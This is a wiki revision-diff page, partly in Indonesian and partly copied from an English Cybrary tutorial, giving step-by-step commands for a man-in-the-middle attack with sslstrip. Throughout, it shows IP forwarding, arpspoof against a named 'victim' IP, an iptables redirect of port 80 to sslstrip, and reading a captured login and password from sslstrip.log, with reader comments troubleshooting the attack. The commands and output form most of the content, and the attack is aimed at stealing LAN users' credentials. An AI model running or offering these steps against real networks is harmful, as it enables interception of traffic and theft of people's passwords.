Difference between revisions of "MITM: sslstrip"

From OnnoWiki
Jump to navigation Jump to search
 
(18 intermediate revisions by the same user not shown)
Line 2: Line 2:
  
  
Cybrary
+
Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.
  
    Courses
+
Cek routing,
    Certification
 
    0P3N
 
    CH4NN3LS
 
    Explore
 
    Teams
 
  
Tutorial: Using SSLSTRIP in a “Man in the Middle” Attack
+
route -n
Profile image for skyle17
+
netstat -nr
fr4nc1stein
 
June 23, 2015 | Views: 45270
 
Save
 
Email
 
Begin Learning Cyber Security for FREE Now!
 
FREE REGISTRATIONAlready a Member Login Here
 
SSLSTRIP in a Man in the Middle Attack
 
  
+
==aktifkan ip forwarding==
 
 
Hello guys,
 
 
 
In this tutorial, I’m going to teach you how to use a SSLSTRIP via the Kali OS.
 
 
 
We’ll use SSLSTRIP for sniff or steal password in a Target PC via LAN (Local Area Network). SSLSTRIP is known in hijacking HTTP traffic on a network. For testing, we’ll try to use VMWARE and download the Kali Operating System. I’m using BT5 (Backtrack) in my presentation.
 
 
 
 
 
 
Requirements:
 
 
 
1. Kali OS  – Click here
 
 
 
2. Syntax Code from the Author of the SSLSTRIP
 
 
 
3. Common sense
 
 
 
 
 
 
We’re assuming SSLSTRIP is already installed in Kali Operating system:
 
 
 
Step 1: Open Terminal
 
 
 
 
 
 
Step 2: In order to run SSLSTRIP in MITM, you need to know the Target IP and the IP of Gateway of the router. To find the router gateway IP, here’s the code:
 
 
 
route -n
 
  
or
+
enable forward paket,
  
netstat -nr
+
echo 1 > /proc/sys/net/ipv4/ip_forward
 +
sysctl -w net.ipv4.ip_forward=1
  
 +
==arp spoofing==
 
   
 
   
 +
lakukan arpspoof,
  
Step 3: Port forward for accept packets and forward as vise versa
+
arpspoof -i eth0 -t victimip routerip
  
disabled = 0
+
arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
 +
192.168.0.106 = ip victim
 +
192.168.0.100 = ip router / gateway / server yang akan di monitor
  
enabled = 1
+
Cek apakah berhasil, arp -n di 192.168.0.106
  
Code: echo “1” > /proc/sys/net/ipv4/ip_forward
+
arp -n
 +
Address                  HWtype  HWaddress          Flags Mask            Iface
 +
192.168.0.13            ether  ec:a8:6b:f8:2e:fc  C                    enp3s0
 +
192.168.0.223            ether  d0:04:92:19:cc:38  C                    enp3s0
 +
192.168.0.7              ether  4c:e6:76:1f:15:4c  C                    enp3s0
 +
192.168.0.100            ether  66:31:65:39:62:38  C                    enp3s0
  
See image below:
+
Setelah arpspoof di jalankan, lakukan arp -n
  
image 1
+
arp -n
 +
Address                  HWtype  HWaddress          Flags Mask            Iface
 +
192.168.0.13            ether  ec:a8:6b:f8:2e:fc  C                    enp3s0
 +
192.168.0.146            ether  08:00:27:45:7a:dc  C                    enp3s0
 +
192.168.0.223            ether  d0:04:92:19:cc:38  C                    enp3s0
 +
192.168.0.7              ether  4c:e6:76:1f:15:4c  C                    enp3s0
 +
192.168.0.100            ether  08:00:27:45:7a:dc  C                    enp3s0
  
+
Perhatikan MAC address 192.168.0.100 berubah :) ..
  
Step 4: In a real attack, we’d be using ARPSPOOF against the layer 2 segments. In the images below, I modified the $routerip, but we make a simple instruction. At step 2, we find the router IP is 192.168.109.2. To use ARSPOOF, follow this code.
+
==redirect packet==
  
Code: arpspoof -i eth0 -t victimip routerip
+
redirect inbound traffic ke port 80 (http), menuju port 8080 (sslstrip).
  
See images below:
+
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
 +
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  
image 2
 
three 3
 
  
Note: The $routerip was already modified in advanced tutorial. Don’t follow the image – you can use this example:
+
Untuk redirect HTTPS (port 443) kayanya masih bermasalah baik untuk sslstrip maupun mitmproxy
  
Code: arpspoof -t eth0 -t  192.168.109.18 192.168.109.2
+
==sslstrip==
  
192.168.109.18 = victim ip
+
Jalankan sslstrip agar listen pada port 8080
  
192.168.109.2 =router ip or gateway
+
cd ~
 +
sslstrip -l 8080 (untuk kali linux)
 +
python sslstrip.pl –l 8080 (untuk backtrack)
  
+
==lihat log==
  
Step 5: Modify the IP table. Let’s understand iptables: iptables take traffic inbound to our Kali Linux machine, on which the destination is port 80 (also known as the HTTP web port. It redirects traffic to the port 1000, which is listening through the use of SSLSTRIP).
+
hasil penyadapan bisa dilihat di sslstrip.log, misalnya,
  
Code: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000
+
cd ~
 +
tail sslstrip.log
 +
more sslstrip.log
  
See image below:
+
2017-04-04 17:07:16,065 POST Data (192.168.0.100):
 +
login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1
  
imahe 4
 
 
 
 
Step 6: Voila, peak time. We’re going to open our SSLSTRIP.
 
 
In Kali:
 
 
Application -> kali linux -> information gathering ->sslstrip analysis – >sslstrip
 
 
In BT:
 
 
Application -> Backtrack -> Exploitation tools -> Web Exploitation Tools ->ssltrip
 
 
See the image below:
 
image 5
 
 
Run the following to start the SSLSTRIP, which we set at port 1000.
 
 
In Kali:
 
Code: sslstrip -l 1000
 
 
In BT:
 
Code: python sslstrip.pl –l 1000
 
 
 
 
Step 7: An example of Victim login at hotmail.com.
 
 
See image below:
 
image 6
 
 
 
 
Step 8: Open the sslstrip.log
 
 
See image below:
 
 
image 7
 
 
The username and password is in cleartext – the blur portion in picture.
 
 
 
 
Thank you!
 
 
Regards from Philippine Security Researcher
 
 
/fr4nc1stein
 
 
/skyle17
 
Share and Earn Cybytes
 
FacebookTwitterGoogle+LinkedInEmail
 
Save
 
+1
 
8
 
18
 
Use Cybytes and
 
Tip the Author!
 
Join
 
Share and Earn
 
Cybytes
 
FacebookTwitterGoogle+LinkedInEmail
 
Ready to share your knowledge and expertise?
 
Submit to 0P3N
 
Looking to train your own company?
 
Sign up now using Cybrary Teams!
 
Get access to:
 
 
    Unlimited Certificates of Completion
 
    Unlimited Micro Certification Tests
 
    Practical CTF Style Assessments
 
    120 Hands-on Virtual Security Labs
 
 
Learn More
 
18 Comments
 
 
    Profile image for mrdnf
 
    mrdnf
 
    11:27 am on August 24, 2016
 
 
    I followed the instructions but there was nothing in sslstrip.log; any idea please?
 
    This is my Kali’s version:
 
    Linux kaliv2 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
 
 
    and Win7 client:
 
    Host Name: WIN7
 
    OS Name: Microsoft Windows 7 Enterprise
 
    OS Version: 6.1.7600 N/A Build 7600
 
    OS Manufacturer: Microsoft Corporation
 
    OS Configuration: Member Workstation
 
    OS Build Type: Multiprocessor Free
 
    Registered Owner:
 
    Registered Organization:
 
    Product ID: 55041-049-8865546-86969
 
    Original Install Date: 4/15/2010, 4:29:26 PM
 
    System Boot Time: 8/24/2016, 7:08:18 PM
 
    System Manufacturer: VMware, Inc.
 
    System Model: VMware Virtual Platform
 
    System Type: X86-based PC
 
    Processor(s): 1 Processor(s) Installed.
 
    [01]: x64 Family 6 Model 42 Stepping 7 GenuineIntel ~
 
    2195 Mhz
 
    BIOS Version: Phoenix Technologies LTD 6.00, 5/20/2014
 
    Windows Directory: C:\Windows
 
    System Directory: C:\Windows\system32
 
    Boot Device: \Device\HarddiskVolume1
 
    System Locale: en-us;English (United States)
 
    Input Locale: en-us;English (United States)
 
    Time Zone:
 
    Total Physical Memory: 511 MB
 
    Available Physical Memory: 298 MB
 
    Virtual Memory: Max Size: 1,535 MB
 
    Virtual Memory: Available: 879 MB
 
    Virtual Memory: In Use: 656 MB
 
    Page File Location(s): C:\pagefile.sys
 
    Domain:
 
    Logon Server:
 
    Hotfix(s): N/A
 
    Network Card(s): 1 NIC(s) Installed.
 
    [01]: Intel(R) PRO/1000 MT Network Connection
 
    Connection Name: Local Area Connection 2
 
    DHCP Enabled: Yes
 
    DHCP Server: 192.168.234.254
 
    IP address(es)
 
    [01]: 192.168.234.137
 
    Log in to Reply
 
    Profile image for zaakkniight
 
    zaakkniight
 
    9:25 am on August 15, 2016
 
 
    arpspoof -t eth0 -t 192.168.109.18 192.168.109.2
 
    arpspoof -i eth0 -t 192.168.109.18 192.168.109.2 (I for interface)
 
    Log in to Reply
 
    Profile image for mattbelle
 
    mattbelle
 
    12:11 pm on July 23, 2016
 
 
    the target’s browser gives a warning telling the victim that this site isn’t secured and refuses to proceed
 
    Log in to Reply
 
        Profile image for grench
 
        Grench
 
        7:42 pm on September 20, 2016
 
 
        That is a problem
 
        Log in to Reply
 
    Profile image for du54nr
 
    Du54nR
 
    4:45 pm on May 4, 2016
 
 
    Is it also working with https (443) links ? Facebook like ?
 
    Log in to Reply
 
        Profile image for phexcom
 
        TYEB
 
        3:56 pm on June 24, 2016
 
 
        What it does is that it actually removes the https and replace it with http. Like the name implies SSLstrip. So it just strip off the ssl
 
        Log in to Reply
 
    Profile image for
 
    ken94
 
    12:38 pm on April 29, 2016
 
 
    i think it works on only old versions of browsers,i do update my system,softwares so my my browser firefox stub 46.0 (latest currently)does not fall for the attack,gives some errors when i attempt to open https sites!
 
    Log in to Reply
 
        Profile image for grench
 
        Grench
 
        7:44 pm on September 20, 2016
 
 
        Firefox is really secure and updated with frequency to detect MITM attacks.
 
        Log in to Reply
 
 
Page 3 of 3«123
 
Comment on This
 
 
You must be logged in to post a comment.
 
Related Reads
 
Effective Information Gathering Yields Successful ...
 
Profile image for gh4d3r
 
June 18, 2015
 
By: GH4D3R
 
815
 
The Penetration Testers Framework (PTF)
 
Profile image for grotherus
 
April 15, 2016
 
By: Johan Grotherus
 
8626
 
New Players on the Field
 
January 30, 2017
 
By: CyberHat
 
28
 
ThreatQ 3.0 Adheres to Einstein’s 3 Rules to Str ...
 
February 2, 2017
 
By: ThreatQuotient
 
51
 
Our Revolution
 
We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.
 
Student Support
 
Get Support
 
Other Pages
 
 
    About
 
    The Team
 
    Join Our Team
 
    Press
 
    Terms of Service
 
    Verify Certificate
 
    Archived Cybrary Courses
 
    Submit Suggestions
 
    Companies
 
 
Cybrary On The Go
 
 
Get the Cybrary app for Android for online and offline viewing of our lessons.
 
Get it on Google Play
 
 
Support Cybrary
 
 
Donate Here to Get This Month's Donor Badge
 
 
Cybrary|0P3N
 
Profile image for spiritedwolf
 
spiritedwolf
 
[Part 2]$~Metasploit for Beginners
 
Views: 1278 / April 3, 2017
 
Profile image for gurubaran
 
gurubaran
 
A Penetration Testing Checklist For Linux Machine – Intrusion Discovery
 
Views: 1477 / April 3, 2017
 
Profile image for dollar163
 
Hari Charan
 
HTML Injection Reflected – POST
 
Views: 2567 / April 2, 2017
 
Profile image for chiheb
 
chiheb chebbi
 
Escaping Linux CHROOT Jail
 
Views: 1842 / April 1, 2017
 
  
    FOLLOW US:
+
==Crashing==
  
© 2016 Cybrary.IT - Privacy Policy - Terms of Service
+
Entah kenapa sslstrip ini suka crash :( ...
Back to Top
 
Skip to toolbar
 
  
    Log in
+
Solusinya, coba tambahkan > /dev/null
    Register
 
  
 +
sslstrip -k -f -l 10000 2> /dev/null
  
  

Latest revision as of 09:23, 3 October 2018

Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/


Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.

Cek routing,

route -n
netstat -nr

aktifkan ip forwarding

enable forward paket,

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1

arp spoofing

lakukan arpspoof,

arpspoof -i eth0 -t victimip routerip
arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = ip victim
192.168.0.100 = ip router / gateway / server yang akan di monitor

Cek apakah berhasil, arp -n di 192.168.0.106

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   66:31:65:39:62:38   C                     enp3s0

Setelah arpspoof di jalankan, lakukan arp -n

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.146            ether   08:00:27:45:7a:dc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   08:00:27:45:7a:dc   C                     enp3s0

Perhatikan MAC address 192.168.0.100 berubah :) ..

redirect packet

redirect inbound traffic ke port 80 (http), menuju port 8080 (sslstrip).

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


Untuk redirect HTTPS (port 443) kayanya masih bermasalah baik untuk sslstrip maupun mitmproxy

sslstrip

Jalankan sslstrip agar listen pada port 8080

cd ~
sslstrip -l 8080 (untuk kali linux)
python sslstrip.pl –l 8080 (untuk backtrack)

lihat log

hasil penyadapan bisa dilihat di sslstrip.log, misalnya,

cd ~
tail sslstrip.log
more sslstrip.log 
2017-04-04 17:07:16,065 POST Data (192.168.0.100):
login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1


Crashing

Entah kenapa sslstrip ini suka crash :( ...

Solusinya, coba tambahkan > /dev/null

sslstrip -k -f -l 10000 2> /dev/null


Referensi